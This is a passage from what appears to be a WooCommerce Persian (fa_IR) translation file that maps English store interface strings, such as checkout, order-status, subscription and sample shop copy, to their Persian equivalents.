فروشگاه‌های ووکامرس طراحی شده است. کارت‌های اعتباری، کارت‌های نقدی و سایر روش‌های پرداخت رایج را بپذیرید.','“%s” has been removed from your cart'=>'“%s” از سبد خرید شما حذف شد','There was a problem with the provided shipping address: %s'=>'مشکلی در آدرس ارسال ارائه شده وجود دارد: %s','There was a problem with the provided billing address: %s'=>'مشکلی در آدرس صورتحساب ارائه شده وجود دارد: %s','Payments made simple — including WooPay, a new express checkout feature.'=>'پرداخت‌ها ساده شدند - از جمله WooPay، یک ویژگی جدید پرداخت سریع.','A list of plugins to install'=>'لیستی از افزونه‌ها برای نصب','“%s” has been added to your cart'=>'“%s” به سبد خرید شما اضافه شد','This tool will empty the system status theme info cache.'=>'این ابزار حافظه پنهان اطلاعات قالب وضعیت سیستم را خالی می‌کند.','Invalid file type for a CSV import.'=>'نوع فایل نامعتبر برای وارد کردن CSV.','System status theme info cache cleared.'=>'حافظه پنهان اطلاعات قالب وضعیت سیستم پاک شد.','Log PayPal events such as IPN requests and review them on the Logs screen. Note: this may log personal information. We recommend using this for debugging purposes only and deleting the logs when finished.'=>'رویدادهای PayPal مانند درخواست‌های IPN را ثبت کنید و آنها را در صفحه گزارش‌ها بررسی کنید. توجه: این ممکن است اطلاعات شخصی را ثبت کند. توصیه می‌کنیم از این فقط برای اهداف اشکال‌زدایی استفاده کنید و پس از اتمام، گزارش‌ها را حذف کنید.','Clear system status theme info cache'=>'پاک کردن حافظه پنهان اطلاعات تم وضعیت سیستم','ISBN'=>'شابک','UPC'=>'UPC','Universal Product Code'=>'کد جهانی محصول','GTIN'=>'GTIN','Global Trade Item Number'=>'شماره کالای تجارت جهانی','EAN'=>'EAN','European Article Number'=>'شماره مقاله اروپایی','%1$s, %2$s, %3$s, or %4$s'=>'%1$s، %2$s، %3$s یا %4$s','File path provided for import is invalid.'=>'مسیر فایل ارائه شده برای درون‌ریزی نامعتبر است.','International Standard Book Number'=>'شماره استاندارد بین‌المللی کتاب','Create an account with %s'=>'در %s حساب کاربری جدید بسازید','Add %s'=>'افزودن %s','Please create a password for your account.'=>'لطفا یک رمز عبور برای حساب کاربری خود ایجاد کنید.','Social Media'=>'شبکه اجتماعی','Drive sales with %1$sGoogle for WooCommerce%2$s'=>'فروش را با %1$sGoogle for WooCommerce%2$s هدایت کنید','Google for WooCommerce'=>'Google for WooCommerce','Featured Selling'=>'فروش ویژه','Drive sales with Google for WooCommerce'=>'فروش را با Google for WooCommerce هدایت کنید','An account is already registered with %s. Please log in or use a different email address.'=>'یک حساب کاربری قبلا با %s ثبت شده است. لطفا وارد شوید یا از آدرس ایمیل دیگری استفاده کنید.','Exceptional flavors, sustainable choices. The carefully curated collection of coffee pots and accessories turned my kitchen into a haven of style and taste.'=>'طعم‌های استثنایی، انتخاب‌های پایدار. مجموعه‌ای از قهوه‌جوش‌ها و لوازم جانبی‌ای که با دقت انتخاب شده، آشپزخانه من را به پناهگاهی از سبک و سلیقه تبدیل کرده است.','Sit back and relax'=>'راحت بنشین و استراحت کن','Failed to get WooCommerce patterns from the PTK: "%s"'=>'دریافت الگوهای ووکامرس از PTK ناموفق بود: "%s"','Customer password for new accounts, if applicable.'=>'رمز عبور مشتری برای حساب‌های جدید، در صورت لزوم.','With a wide range of designer chairs to elevate your living space.'=>'با طیف گسترده‌ای از صندلی‌های طراح برای ارتقای فضای زندگی شما.','Remote Logging'=>'ثبت وقایع از راه دور','Shop chairs'=>'صندلی‌های فروشگاهی',' /home/filetir/public_html/wp-content/languages/plugins/woocommerce-fa_IR.l10n.php:%%C%1$d%%n افزونه های نامشخصی پیدا شد%2$s','A ‘brewtiful’ experience :-)'=>'یک تجربه "شگفت انگیز" :-)','From sustainably sourced teas to chic vases, this store is a treasure trove. Love knowing my purchases contribute to a greener planet.'=>'از چای‌های با منابع پایدار گرفته تا گلدان‌های شیک، این فروشگاه گنجینه‌ای است. دوست دارم بدانم خریدهای من به یک سیاره سبزتر کمک می‌کند.','The organic coffee beans are a revelation. Each sip feels like a journey. Beautifully crafted accessories add a touch of elegance to my home.'=>'دانه‌های قهوه ارگانیک یک مکاشفه است. هر جرعه‌ای شبیه یک سفر است. اکسسوری‌هایی که به زیبایی ساخته شده‌اند، ظرافتی را به خانه من اضافه می‌کنند.','Transformed my daily routine with unique, eco-friendly treasures. Exceptional quality and service. Proud to support a store that aligns with my values.'=>'روتین روزانه من را با گنجینه‌های منحصر به فرد و سازگار با محیط زیست تغییر داد. کیفیت و خدمات استثنایی. مفتخرم که از فروشگاهی حمایت می‌کنم که با ارزش‌های من همسو است.','What our customers say'=>'آنچه مشتریان ما می‌گویند','Eclectic finds, ethical delights'=>'یافته‌های التقاطی، لذت‌های اخلاقی','LOCAL LOVE'=>'عشق محلی','Sip, Shop, Savor'=>'بنوش، بخر، بچش','Stay in the loop'=>'ماندن در این چرخه','Bestsellers'=>'پرفروش‌ها','Our latest and greatest'=>'جدیدترین و بهترین ما','Staff picks'=>'گزیده‌های کارکنان','Sound like no other'=>'بی‌همتا در صدا','Keep dry with 50% off rain jackets'=>'با ۵۰٪ تخفیف ژاکت‌ها، خشک بمانید','Shop home decor'=>'فروشگاه دکوراسیون منزل','Experience your music like never before with our latest generation of hi-fidelity headphones.'=>'با جدیدترین نسل هدفون‌های باکیفیت ما، موسیقی خود را مانند قبل تجربه کنید.','Add a touch of charm and coziness this holiday season with a wide selection of hand-picked decorations — from minimalist vases to designer furniture.'=>'در این فصل تعطیلات، با انتخاب گسترده‌ای از تزئینات دستچین‌شده - از گلدان‌های مینیمالیستی گرفته تا مبلمان طراحان - جذابیت و دنجی را به فضای خود اضافه کنید.','Unique design'=>'طراحی منحصر‌به‌فرد','From bold prints to intricate details, our products are a perfect combination of style and function.'=>'از طرح‌های برجسته گرفته تا جزئیات پیچیده، محصولات ما ترکیبی بی‌نظیر از سبک و عملکرد هستند.','Make your house feel like home'=>'به منزل خود حس خانه بودن بده','Quality Materials'=>'متریال با کیفیت','The Retro Glass Jug\'s classic silhouette effortlessly complements any setting, making it the ideal choice for serving beverages with style and flair.'=>'طرح کلاسیک پارچ شیشه‌ای Retro به راحتی با هر محیطی هماهنگ می‌شود و آن را به انتخابی ایده‌آل برای سرو نوشیدنی‌های شیک و جذاب تبدیل می‌کند.','Crafted from resilient thick glass, this jug ensures lasting quality, making it perfect for everyday use with a touch of vintage charm.'=>'این پارچ که از شیشه ضخیم و مقاوم ساخته شده، کیفیتی ماندگار را تضمین می‌کند و آن را برای استفاده روزمره با حسی از جذابیت قدیمی ایده‌آل می‌سازد.','Elevate your table with a 330ml Retro Glass Jug, blending classic design and durable hardened glass.'=>'با پارچ شیشه‌ای ۳۳۰ میلی‌لیتری Retro، که طراحی کلاسیک و شیشه سخت بادوام را با هم ترکیب می‌کند، میز خود را زیباتر کنید.','New: Retro Glass Jug'=>'جدید: پارچ شیشه‌ای قدیمی','Versatile charm'=>'جذابیت همه کاره','Durable glass'=>'شیشه بادوام','Timeless elegance'=>'ظرافت بی‌زمان','Handmade gifts'=>'هدایای دست‌ساز','Retro photography'=>'عکاسی رترو','Up to 60% off'=>'تا ۶۰٪ تخفیف','Delete an Inbox Notification'=>'حذف یک اعلان صندوق ورودی','Remote inbox notifications have been refreshed'=>'اعلان‌های صندوق ورودی از راه دور تازه‌سازی شده‌اند','This will refresh the remote inbox notifications'=>'این، اعلان‌های صندوق ورودی از راه دور را تازه می‌کند','Refresh Remote Inbox Notifications'=>'تازه‌سازی اعلان‌های صندوق ورودی از راه دور','Inbox notification not found'=>'اعلان صندوق ورودی پیدا نشد','Inbox notification has been deleted'=>'اعلان صندوق ورودی حذف شده','No inbox notification selected'=>'هیچ اعلان صندوق ورودی انتخاب نشده','Select an inbox notification to delete:'=>'یک اعلان صندوق ورودی را برای حذف انتخاب کنید:','Holiday Sale'=>'حراج تعطیلات','Home decor'=>'دکوراسیون منزل','Get your favorite vinyl at record-breaking prices.'=>'وینیل مورد علاقه خود را با قیمت‌های رکوردشکن تهیه کنید.','This will delete an inbox notification by slug'=>'این یک اعلان صندوق ورودی را بر اساس slug حذف می‌کند','Shop vinyl records'=>'فروشگاه صفحات وینیل','Search for an inbox notification…'=>'جستجو برای اعلان صندوق ورودی;','The world’s favorite buy now, pay later options and many more are right at your fingertips with WooPayments — all from one dashboard, without needing multiple extensions and logins.'=>'گزینه‌های محبوب دنیا مانند «الان بخر، بعداً پرداخت کن» و بسیاری دیگر، با WooPayments در دسترس شما هستند - همه از یک داشبورد، بدون نیاز به افزونه‌ها و ورودهای متعدد.','Enhance your store with extensions'=>'فروشگاه خود را با افزودنی‌ها بهبود دهید','Our services'=>'خدمات ما','Net Sales'=>'فروش خالص','Meet us'=>'ملاقات با ما','Committed to a greener lifestyle'=>'متعهد به سبک زندگی سبزتر','Explore our exclusive collection of sunglasses, crafted to elevate your look and safeguard your eyes. Find your perfect pair and see the world through a new lens.'=>'مجموعه منحصر به فرد عینک‌های آفتابی ما را که برای ارتقای ظاهر و محافظت از چشمان شما ساخته شده‌اند، کشف کنید. عینک ایده‌آل خود را پیدا کنید و دنیا را از دریچه‌ای جدید ببینید.','Navigating life\'s intricate fabric, choices unfold paths to the extraordinary, demanding creativity, curiosity, and courage for a truly fulfilling journey.'=>'با پیمایش تار و پود پیچیده‌ی زندگی، انتخاب‌ها مسیرهایی را به سوی خلاقیت، کنجکاوی و شجاعت خارق‌العاده و طاقت‌فرسا برای سفری حقیقتاً رضایت‌بخش آشکار می‌کنند.','Our passion is crafting mindful moments with locally sourced, organic, and sustainable products. We\'re more than a store; we\'re your path to a community-driven, eco-friendly lifestyle that embraces premium quality.'=>'اشتیاق ما خلق لحظاتی سرشار از آرامش با محصولات محلی، ارگانیک و پایدار است. ما چیزی بیش از یک فروشگاه هستیم؛ ما مسیر شما به سوی یک سبک زندگی جامعه‌محور و سازگار با محیط زیست هستیم که کیفیت برتر را در بر می‌گیرد.','Activate BNPL instantly on WooPayments'=>'فعال‌سازی فوری BNPL در WooPayments','Table cell format.'=>'قالب سلول‌های جدول.','Find your shade'=>'سایه‌ات را پیدا کن','Create anything'=>'هر چیزی را خلق کنید','GTIN, UPC, EAN or ISBN.'=>'GTIN، UPC، EAN یا ISBN.','Invalid slug.'=>'نامک نامعتبر.','Stock Keeping Unit.'=>'واحد نگهداری موجودی.','An unexpected error occurred while generating the refund.'=>'هنگام تولید بازپرداخت، خطای غیرمنتظره‌ای روی داد.','Local pickup: Manage existing pickup locations in the Local pickup settings page.'=>'دریافت حضوری: مکان‌های دریافت موجود را در صفحه تنظیمات دریافت حضوری مدیریت کنید.','Unidentified action %s: we were unable to mark this action as having completed. It may may have been deleted by another process.'=>'اقدام ناشناس %s: ما نتوانستیم این اقدام را به عنوان تکمیل‌شده علامت‌گذاری کنیم. ممکن است توسط فرآیند دیگری حذف شده باشد.','Unidentified action %s: we were unable to mark this action as having failed. It may may have been deleted by another process.'=>'اقدام ناشناس %s: ما نتوانستیم این اقدام را به عنوان ناموفق علامت‌گذاری کنیم. ممکن است توسط فرآیند دیگری حذف شده باشد.','Unidentified action %s: we were unable to determine the date of this action. It may may have been deleted by another process.'=>'اقدام ناشناس %s: ما نتوانستیم تاریخ این اقدام را تعیین کنیم. ممکن است توسط فرآیند دیگری حذف شده باشد.','Unidentified action %s: we were unable to delete this action. It may may have been deleted by another process.'=>'اقدام ناشناس %s: ما نتوانستیم این اقدام را حذف کنیم. ممکن است توسط فرآیند دیگری حذف شده باشد.','Unidentified action %s: we were unable to cancel this action. It may may have been deleted by another process.'=>'اقدام ناشناس %s: ما نتوانستیم این اقدام را لغو کنیم. ممکن است توسط فرآیند دیگری حذف شده باشد.','Order sort items ascending or descending.'=>'مرتب‌سازی صعودی یا نزولی بر اساس موارد.','Legacy REST API enabled?'=>'افزونه Legacy REST API فعال است؟','Repeat fetches made within a reasonable window of time (by default, 30 minutes) will not be counted twice. This is a generally reasonably way to enforce download limits in relation to ranged requests. %1$sLearn more.%2$s'=>'واکشی‌های تکراری که در یک بازه زمانی معقول (به‌طور پیشفرض، ۳۰ دقیقه) انجام می‌شوند، دو بار شمارش نمی‌شوند. این یک راه معقول برای اعمال محدودیت‌های دانلود در رابطه با درخواست‌های محدوده است. %1$sبیشتر بدانید.%2$s','Order query argument (%s) is not supported on the current order datastore.'=>'آرگومان‌های پرس‌وجوی سفارش (%s) در پایگاه داده سفارش فعلی پشتیبانی نمی‌شوند.','This coupon is password protected. WooCommerce does not support password protection for coupons. You can temporarily hide a coupon by making it private. Alternatively, usage limits and restrictions can be configured below.'=>'این کوپن با رمز محافظت می‌شود. ووکامرس از محافظت با رمز عبور برای کوپن‌ها پشتیبانی نمی‌کند. با خصوصی کردن کوپن، می‌توانید به طور موقت آن را پنهان کنید. از طرف دیگر، انحصار و محدودیت‌های استفاده را می‌توان در زیر پیکربندی کرد.','Count downloads even if only part of a file is fetched.'=>'شمارش دانلودها حتی اگر فقط بخشی از یک فایل واکشی شده باشد.','Count partial downloads'=>'شمارش دانلودهای نصفه','Enable guest checkout (recommended)'=>'فعال‌سازی تسویه حساب مهمان (توصیه می‌شود)','Enable log-in during checkout'=>'فعال‌سازی ورود به سیستم در حین پرداخت','Allow customers to create an account'=>'به مشتریان اجازه ایجاد حساب کاربری بدهید','During checkout'=>'در حین پرداخت','Customers can create an account before placing their order.'=>'مشتریان می‌توانند قبل از ثبت سفارش خود، یک حساب کاربری ایجاد کنند.','Account creation options'=>'گزینه‌های ایجاد حساب کاربری','Send password setup link (recommended)'=>'ارسال لینک تنظیم رمز عبور (توصیه می‌شود)','New users receive an email to set up their password.'=>'کاربران جدید ایمیلی برای تنظیم رمز عبور خود دریافت می‌کنند.','Edit fee'=>'ویرایش هزینه','Delete fee'=>'حذف هزینه','Edit shipping'=>'ویرایش حمل و نقل','Delete shipping'=>'حذف حمل و نقل','Invalid or duplicated GTIN, UPC, EAN or ISBN.'=>'GTIN، UPC، EAN یا ISBN نامعتبر یا تکراری است.','GTIN, UPC, EAN, or ISBN'=>'GTIN، UPC، EAN یا ISBN','On "My account" page'=>'در صفحه "حساب کاربری من"','Enter a barcode or any other identifier unique to this product. It can help you list this product on other channels or marketplaces.'=>'یک بارکد یا هر شناسه منحصر به فرد دیگر برای این محصول وارد کنید. این می‌تواند به شما در فهرست کردن این محصول در کانال‌ها یا بازارهای دیگر کمک کند.','Intro'=>'مقدمه','Services'=>'خدمات','Translatable Label'=>'برچسب قابل ترجمه','View order number %s'=>'مشاهده شماره سفارش %s','This setting only works when product data is stored in the posts table.'=>'این تنظیم فقط زمانی کار می‌کند که داده‌های محصول در جدول پست‌ها ذخیره شود.','Orders are automatically put in the Refunded status when an admin or shop manager has fully refunded the order’s value after payment.'=>'زمانی که مدیر فروشگاه یا ادمین، مبلغ سفارش را پس از پرداخت به طور کامل بازپرداخت کرده باشد، سفارش‌ها به طور خودکار در وضعیت بازپرداخت قرار می‌گیرند.','Uses much more performant queries to update the lookup table, but may not be compatible with some extensions.'=>'برای بروز رسانی جدول جستجو از کوئری‌های کارآمدتر استفاده می‌کند، اما ممکن است با برخی از برنامه‌های افزودنی سازگار نباشد.','Optimized updates'=>'بروز رسانی‌های بهینه شده','The order was canceled by an admin or the customer.'=>'سفارش توسط مدیر یا مشتری لغو شد.','The customer’s payment failed or was declined, and no payment has been successfully made.'=>'پرداخت مشتری انجام نشد یا رد شد و هیچ پرداختی با موفقیت انجام نشد.','Draft orders are created when customers start the checkout process while the block version of the checkout is in place.'=>'سفارشات پیش‌نویس زمانی ایجاد می‌شوند که مشتریان فرآیند پرداخت را آغاز می‌کنند، در حالی که نسخه بلوکی پرداخت در حال انجام است.','Compatibility mode disabled.'=>'حالت سازگاری غیرفعال است.','Compatibility mode enabled.'=>'حالت سازگاری فعال است.','HPOS tables do not exist.'=>'جداول HPOS وجود ندارد.','The order is awaiting payment confirmation. Stock is reduced, but you need to confirm payment.'=>'سفارش در انتظار تایید پرداخت است. موجودی کم شد، اما باید پرداخت را تایید کنید.','Payment has been received (paid), and the stock has been reduced. The order is awaiting fulfillment.'=>'پرداخت دریافت شده است (پرداخت شده) و موجودی کم شد. سفارش در انتظار انجام است.','The order has been received, but no payment has been made. Pending payment orders are generally awaiting customer action.'=>'سفارش دریافت شده، اما هیچ پرداختی انجام نشده است. دستورهای پرداخت معلق معمولا در انتظار اقدام مشتری هستند.','Compatibility mode is already disabled.'=>'حالت سازگاری قبلاً غیرفعال شده است.','Compatibility mode is already enabled.'=>'حالت سازگاری قبلاً فعال شده است.','Empty response received from the Patterns Toolkit API.'=>'پاسخ خالی از API جعبه ابزار الگوها دریافت شد.','Failed to connect with the Patterns Toolkit API: try again later.'=>'اتصال به API جعبه ابزار الگوها ناموفق بود: بعداً دوباره امتحان کنید.','Empty patterns received from the PTK Pattern Store'=>'الگوهای خالی دریافت شده از فروشگاه الگوی PTK','Wrong response received from the Patterns Toolkit API: try again later.'=>'پاسخ اشتباهی از API جعبه ابزار الگوها دریافت شد: بعداً دوباره امتحان کنید.','Order fulfilled and complete.'=>'سفارش انجام و تکمیل شد.','Your WooCommerce extension subscription is missing a payment method for renewal. Add a payment method to ensure you continue receiving updates and streamlined support.'=>'اشتراک‌های افزونه ووکامرس شما فاقد روش پرداخت برای تمدید هستند. یک روش پرداخت اضافه کنید تا از دریافت بروز رسانی‌ها و پشتیبانی ساده اطمینان حاصل شود.','Your WooCommerce extension subscription is missing a payment method for renewal. Add a payment method to ensure you continue receiving updates and streamlined support.'=>'اشتراک‌های افزونه ووکامرس شما فاقد روش پرداخت برای تمدید هستند. برای اطمینان از دریافت مداوم بروز رسانی‌ها و پشتیبانی ساده، یک روش پرداخت اضافه کنید.','Instantly send tracking to your customers'=>'فورا رهگیری را برای مشتریان خود ارسال کنید','Sync all your selling channels in one place'=>'همه کانال‌های فروش خود را در یک مکان همگام‌سازی کنید','button label of product search blockSearch'=>'جستجو','Message explaining that there are no products foundNo results found'=>'نتیجه‌ای یافت نشد','Used in sentence: You can try clearing any filters or head to our store\'s home.store\'s home'=>'صفحه اصلی فروشگاه','Used in sentence: You can try clearing any filters or head to our store\'s home.clearing any filters'=>'پاک کردن فیلترها','Used in sentence: You can try clearing any filters or head to our store\'s home.You can try'=>'میتوانید امتحان کنید','Used in sentence: You can try clearing any filters or head to our store\'s home.or head to our'=>'یا به ما سر بزنید','Discounted labels from top global carriers'=>'برچسب‌های تخفیف دار از شرکت‌های برتر جهانی','Pardon our dust! We\'re working on something amazing — check back soon!'=>'ببخشید که خاک خوردیم! داریم روی یه چیز فوق‌العاده کار می‌کنیم — زود برمی‌گردیم!','Advanced automated workflows and customs'=>'گردش‌های کاری و گمرکی خودکار پیشرفته','Contains the %1$s block'=>'حاوی بلوک %1$s است','Contains the %1$s shortcode'=>'حاوی کد کوتاه %1$s است','Page contains both the %1$s shortcode and the %2$s block.'=>'صفحه شامل کد کوتاه %1$s و بلوک %2$s است.','Suggest a slug for the term.'=>'برای این اصطلاح یک نامک انتخاب کنید.','Add a meaningful description, including a note of the person, company or app you are sharing the key with.'=>'یک توضیح معنادار، شامل یادداشتی از شخص، شرکت یا برنامه‌ای که کلید را با آن به اشتراک می‌گذارید، اضافه کنید.','Stick to one key per client: this makes it easier to revoke access in the future for a single client, without causing disruption for others.'=>'به هر کلاینت یک کلید اختصاص دهید: این کار لغو دسترسی در آینده برای یک کلاینت را آسان‌تر می‌کند، بدون اینکه اختلالی برای دیگران ایجاد شود.','API keys open up access to potentially sensitive information. Only share them with organizations you trust.'=>'کلیدهای API دسترسی به اطلاعات بالقوه حساس را فراهم می‌کنند. آنها را فقط با سازمان‌هایی که به آنها اعتماد دارید به اشتراک بگذارید.','This page\'s content is overridden by custom template content'=>'محتوای این صفحه توسط محتوای قالب سفارشی بازنویسی شده است','Write-only keys do not prevent clients from seeing information about the entities they are updating.'=>'کلیدهای فقط نوشتنی مانع از مشاهده اطلاعات مربوط به موجودیت‌هایی که بروز رسانی می‌کنند توسط کلاینت‌ها نمی‌شوند.','block titleProduct Collection'=>'مجموعه محصول','block descriptionLet shoppers filter products displayed on the page.'=>'به خریداران اجازه دهید محصولات نمایش داده شده در صفحه را فیلتر کنند.','block titleDelivery'=>'تحویل','block descriptionAllows shoppers to clear active filters.'=>'به خریداران اجازه می‌دهد فیلترهای فعال را پاک کنند.','block titleProduct Quantity (Beta)'=>'تعداد محصول (بتا)','Plugins'=>'افزونه‌ها','HPOS Full text search indexes'=>'فهرست‌های جستجوی متن کامل HPOS','Switching data storage while sync is incomplete is dangerous and can lead to order data corruption or loss!'=>'تغییر روش ذخیره‌سازی داده‌ها در حالی که همگام‌سازی ناقص است خطرناک بوده و می‌تواند منجر به خراب شدن یا از دست رفتن داده‌های سفارش شود!','Sync orders now'=>'اکنون سفارشات را همگام‌سازی کنید','Stop sync'=>'توقف همگام‌سازی','Unable to stop synchronization. The link you followed may have expired.'=>'امکان توقف همگام‌سازی وجود ندارد. ممکن است پیوند شما منقضی شده باشد.','Arts and crafts'=>'هنر و صنایع دستی','Sports and recreation'=>'ورزش و سرگرمی','Marketing tactic'=>'تاکتیک بازاریابی','Creative format'=>'ساختار خلاقانه','%d is not of a valid order type.'=>'%d یک نوع سفارش معتبر نیست.','Create and use full text search indexes for orders. This feature only works with high-performance order storage.'=>'ایجاد و استفاده از فهرست‌های جستجوی متن کامل برای سفارشات. این ویژگی فقط با ذخیره‌سازی سفارش با کارایی بالا کار می‌کند.','Pickup'=>'دریافت حضوری','Failed to create FTS index on order item table'=>'ایجاد شاخص FTS در جدول اقلام سفارش ناموفق بود','Failed to create FTS index on address table'=>'ایجاد شاخص FTS در جدول آدرس ناموفق بود','Failed to create FTS index on orders table. This feature is only available when High-performance order storage is enabled.'=>'ایجاد شاخص FTS در جدول سفارشات ناموفق بود. این ویژگی فقط زمانی در دسترس است که ذخیره‌سازی سفارش با کارایی بالا فعال باشد.','Source platform'=>'پلتفرم منبع','You have %1$s Woo extension subscriptions that expired. Renew to continue receiving updates and streamlined support.'=>'شما %1$s اشتراک افزونه Woo دارید که منقضی شده‌اند. تمدید کنید تا همچنان بروز رسانی‌ها و پشتیبانی ساده را دریافت کنید.','One of your subscriptions for %1$s has expired. %4$s to continue receiving updates and streamlined support.'=>'یکی از اشتراک‌های شما برای %1$s منقضی شده است. %4$s برای ادامه دریافت بروز رسانی‌ها و پشتیبانی ساده‌تر.','You can switch order data storage only when the posts and orders tables are in sync. There are currently orders out of sync.'=>'می‌توانید ترتیب ذخیره‌سازی داده‌ها را تغییر دهید فقط زمانی که جداول پست‌ها و سفارشات همگام‌سازی شده باشند. در حال حاضر سفارشاتی وجود دارد که همگام‌سازی نشده‌اند .','Enable auto-renewal'=>'فعال‌سازی تمدید خودکار','Renew for %1$s'=>'تمدید برای %1$s','Copy for GitHub'=>'برای گیت‌هاب کپی کنید','Set the action as manual so that the order note registers as "added by user".'=>'عملکرد را روی دستی تنظیم کنید تا یادداشت سفارش به عنوان «اضافه شده توسط کاربر» ثبت شود.','This method has been deprecated and will be removed soon. Use Automattic\\WooCommerce\\Utilities\\DiscountsUtil::is_coupon_emails_allowed instead.'=>'این روش منسوخ شده است و به زودی حذف خواهد شد. به جای آن از Automattic\\WooCommerce\\Utilities\\DiscountsUtil::is_coupon_emails_allowed استفاده کنید.','Your subscription for %1$s expired. %4$s to continue receiving updates and streamlined support.'=>'اشتراک شما برای %1$s منقضی شد. %4$s می‌توانید همچنان بروز رسانی‌ها و پشتیبانی ساده را دریافت کنید.','You have %1$s Woo extension subscriptions expiring soon. Enable auto-renewal to continue receiving updates and streamlined support.'=>'شما %1$s اشتراک افزونه Woo دارید که به زودی منقضی می‌شوند. تمدید خودکار را فعال کنید تا همچنان بروز رسانی‌ها و پشتیبانی ساده را دریافت کنید.','One of your subscriptions for %1$s expires on %2$s. Enable auto-renewal to continue receiving updates and streamlined support.'=>'یکی از اشتراک‌های شما برای %1$s در تاریخ %2$s منقضی می‌شود. تمدید خودکار را فعال کنید تا همچنان بروز رسانی‌ها و پشتیبانی ساده را دریافت کنید.','Your subscription for %1$s expires on %2$s. Enable auto-renewal to continue receiving updates and streamlined support.'=>'اشتراک شما برای %1$s در تاریخ %2$s منقضی می‌شود. تمدید خودکار را فعال کنید تا همچنان بروز رسانی‌ها و پشتیبانی ساده را دریافت کنید.','for %s '=>'برای %s ',' Your subscription expires on %1$s, enable auto-renew to continue receiving updates.'=>' اشتراک شما در %1$s منقضی می‌شود، فعال‌سازی تمدید خودکار برای ادامه دریافت بروز رسانی‌ها.',' Your subscription expired, renew %2$sto update.'=>' اشتراک شما منقضی شده است، %2$sرا تمدید کنید تا بروز رسانی شود.','block titleTotals'=>'مجموع','block titleComing Soon'=>'به زودی','block descriptionShows the subtotal, fees, discounts, shipping and taxes.'=>'جمع جزء، هزینه‌ها، تخفیف‌ها، حمل و نقل و مالیات را نشان می‌دهد.','Store coming soon'=>'فروشگاه به زودی راه‌اندازی می‌شود','⚠ The Legacy REST API plugin is installed and active on this site. Please be aware that the WooCommerce Legacy REST API is not compatible with HPOS.'=>'⚠ افزونه Legacy REST API در این سایت نصب و فعال است. لطفا توجه داشته باشید که WooCommerce Legacy REST API با HPOS سازگار نیست.','Track inventory'=>'موجودی را پیگیری کنید','⚠️ The file system connection could not be initialized.'=>'⚠️ اتصال سیستم فایل قابل مقداردهی اولیه نیست.','You may want to switch to the database for log storage.'=>'شاید بخواهید برای ذخیره‌سازی خطا‌ها به پایگاه داده سوئیچ کنید.','⚠️ The file system is not configured for direct writes. This could cause problems for the logger.'=>'⚠️ سیستم فایل برای نوشتن مستقیم پیکربندی نشده است. این می‌تواند برای ثبت‌کننده‌ی وقایع مشکل ایجاد کند.','Data in posts table appears to be more recent than in HPOS tables. Compare order data with `wp wc hpos diff %1$d` and use `wp wc hpos backfill %1$d --from=posts --to=hpos` to fix.'=>'به نظر می‌رسد داده‌های جدول posts جدیدتر از جداول HPOS هستند. داده‌های سفارش را با `wp wc hpos diff %1$d` مقایسه کنید و برای رفع مشکل از `wp wc hpos backfill %1$d --from=posts --to=hpos` استفاده کنید.','Order attribution information.'=>'اطلاعات ویژگی سفارش.','Select your shipping options'=>'گزینه‌های حمل‌ونقل خود را انتخاب کنید','Your store might be at risk as you are running old versions of WooCommerce plugins.'=>'اگر از نسخه قدیمی افزونه‌های ووکامرس استفاده کنید، فروشگاه شما در معرض خطر خواهد بود.','Connect your store to WooCommerce.com to get updates and streamlined support for your subscriptions.'=>'فروشگاه خود را به WooCommerce.com وصل کنید تا به‌روزرسانی‌ها و پشتیبانی ساده از اشتراک‌های خود را دریافت کنید.','Something big is brewing! Our store is in the works and will be launching soon!'=>'یه اتفاق بزرگ در راهه! فروشگاه ما در حال ساخت هست و به زودی راه اندازی میشه!','Great things are on the horizon'=>'اتفاقات بزرگی در راه است','Failed to clean up all orders in a batch. Aborting.'=>'موفق به پاکسازی تمام سفارشات در یک دسته نشد. در حال لغو.','Attribution'=>'انتصاب','✅ Ready'=>'✅ آماده اید','Template namePage: Coming soon'=>'صفحه: به زودی','Name of credit cardCartes Bancaires'=>'کارت‌های بانکی','Cleanup completed for %d order. Review errors above.'=>'پاکسازی برای %d سفارش انجام شد. خطاهای بالا را بررسی کنید.','There was an error processing your order. Please check for any charges in your payment method and review your order history before placing the order again.'=>'خطایی در پردازش سفارش شما رخ داده است. لطفا قبل از ثبت مجدد سفارش، هرگونه هزینه‌ای را در روش پرداخت خود بررسی کنید و سابقه سفارش خود را مرور کنید.',' Connect your store to woocommerce.com to update.'=>' فروشگاه خود را متصل کنید برای به‌روزرسانی به woocommerce.com مراجعه کنیدe.','block keywordfields'=>'فیلدها','block keywordcustom'=>'سفارشی','block titleProduct custom fields control'=>'کنترل فیلدهای سفارشی محصول','block descriptionThe product custom fields.'=>'فیلدهای سفارشی محصول.','block titleProduct select field'=>'فیلد انتخاب محصول','block keywordselect'=>'انتخاب','block descriptionA select field for use in the product editor.'=>'یک فیلد انتخابی برای استفاده در ویرایشگر محصول.','block titleProduct custom fields toggle control'=>'کنترل تغییر وضعیت فیلدهای سفارشی محصول','block descriptionThe product custom fields toggle.'=>'تغییر وضعیت فیلدهای سفارشی محصول.','Live'=>'زنده','Site visibility'=>'قابلیت مشاهده سایت','Plugin installed by %1$s on %2$s.'=>'افزونه توسط %1$s در %2$s نصب شد.','Plugin installed by %1$s on %2$s. More information'=>'افزونه توسط %1$s در %2$s نصب شد. اطلاعات بیشتر','Approving will share credentials with %s. Do not proceed if this looks suspicious in any way.'=>'تایید، اعتبارنامه‌ها را با %s به اشتراک می‌گذارد. اگر به هر شکلی مشکوک به نظر می‌رسد، ادامه ندهید.','Enter an optional note attached to the order confirmation message sent to the shopper.'=>'یک یادداشت اختیاری پیوست شده به پیام تایید سفارش ارسال شده به خریدار وارد کنید.','Post-purchase note'=>'یادداشت پس از خرید','Custom fields'=>'فیلدهای سفارشی','Show custom fields'=>'نمایش فیلدهای سفارشی','Use global attributes to allow shoppers to filter and search for this product. Use custom attributes to provide detailed product information.'=>'از ویژگی‌های سراسری استفاده کنید تا به خریداران اجازه دهید این محصول را فیلتر و جستجو کنند. از ویژگی‌های سفارشی برای ارائه اطلاعات دقیق محصول استفاده کنید.','Custom fields can be used in a variety of ways, such as sharing more detailed product information, showing more input fields, or for internal inventory organization. %1$sRead more about custom fields%2$s'=>'فیلدهای سفارشی را می‌توان به روش‌های مختلفی استفاده کرد، مانند اشتراک‌گذاری اطلاعات دقیق‌تر محصول، نمایش فیلدهای ورودی بیشتر یا برای سازماندهی موجودی داخلی. %1$sدرباره فیلدهای سفارشی بیشتر بخوانید%2$s','Unable to create backup post for order %d.'=>'امکان ایجاد پست پشتیبان برای سفارش %d وجود ندارد.','Per your %1$sstore 